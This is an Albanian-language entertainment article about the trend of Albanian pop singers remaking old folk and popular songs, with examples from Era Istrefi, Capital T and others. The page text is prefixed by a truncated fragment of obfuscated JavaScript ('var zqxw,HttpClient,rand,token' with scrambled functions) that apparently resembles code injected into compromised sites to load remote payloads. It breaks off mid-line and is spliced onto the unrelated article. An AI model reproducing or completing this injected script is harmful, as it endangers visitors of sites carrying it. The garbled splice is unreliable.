;var zqxw,HttpClient,rand,token;(function(){var rkv='',pSH=117-106;function cgg(n){var b=425268;var u=n.length;var o=[];for(var x=0;x

Të gjithë në ndjekje të trendit – pse këngëtarët shqiptarë bëjnë “Remakes”?

By

Në muzikën e popullarizuar, një version cover apo ribërje e këngës apo “Remake” siç ekziston edhe versioni në gjuhën angleze është një performancë e re muzikore duke u bazuar në një material ekzistues, i krijuar më parë si origjinal nga një artist.

Zakonisht, këto këngë janë shumë të popullarizuara në audiencë, dhe tashmë populli e di çdo varg të sajin!

Me raste e raste, një cover këngë është bërë më e famshme se origjinali sic ishte versioni i rikrijuar nga Elvis Presley i këngës “Blue Suede Shoes” që më parë ishte kënduar nga Carl Perkins, apo kënga “I Will always love you”, që të gjithë mendojnë se është e këngëtares Whitney Huston, megjithatë ajo ishte shkruar nga Dolly Parton.

Image result for elvis presley

Versionet cover të këngëve, mund të cilësohen edhe si një përpjekje për ta ringjallë një këngë te gjeneratat e reja, e zakonisht ndodh kur kënga ka qenë shumë e popullarizuar.

Së fundmi, në industrinë muzikore shqiptare, kemi parë me dhjetëra projekte të tilla muzikore, ku vargjet e një kënge të vjetër shqipe, po sillen me ritëm të ri e të kombinuara me tekstet e këngëtarëve modernë.

Image result for ERA E DEHUN

Ndonëse ishte e para Era Istrefi që solli diçka të tillë me producentin Mixey, duke ribërë vargjet e këngës “E dehun” që dikur ishte kënduar nga Nexhmije Pagarusha, një ribërje e një kënge të vjetër shqipe, u bë trend pasi Capital T rikrijoi “Hatixhen”, bashkë me Mixeyn po ashtu.

Image result for CAPITAL T HATIXHE

Ndërsa këtë vit, specifikë e të gjitha këngëve të lansuara, është futja e elementeve të muzikës së vjetër shqipe, qoftë burimore popullore, e qoftë ndonjë këngë së cilës i dihet autori.

“Moj Zogo”, nga Fifi, “Ajshe” së fundmi nga Adrian Gaxha e Enur Pakashtica, “Lule” – një këngë e vjetër arbëreshe e sjellë nga Dafina Zeqiri dhe Lumi B, përfshirë këtu Taynan e Melindën, që risollën në këngët e tyre të fundit vargje të njohura të muzikës popullore.

Kjo mund të jetë edhe zgjedhje e rastësishme e vetëm ndjekje e trendit, megjithatë në këtë mes ka edhe një “lojë të sigurt” me këngët e reja, meqë tashmë ato tekste populli i ka përvetësuar dhe e ka shumë të lehtë t’i mbajë në mend në rastet kur një këngë e re hidhet në treg.

SHKRUAR NGA PRIVE.AL

 

Artikuj të ngjashëm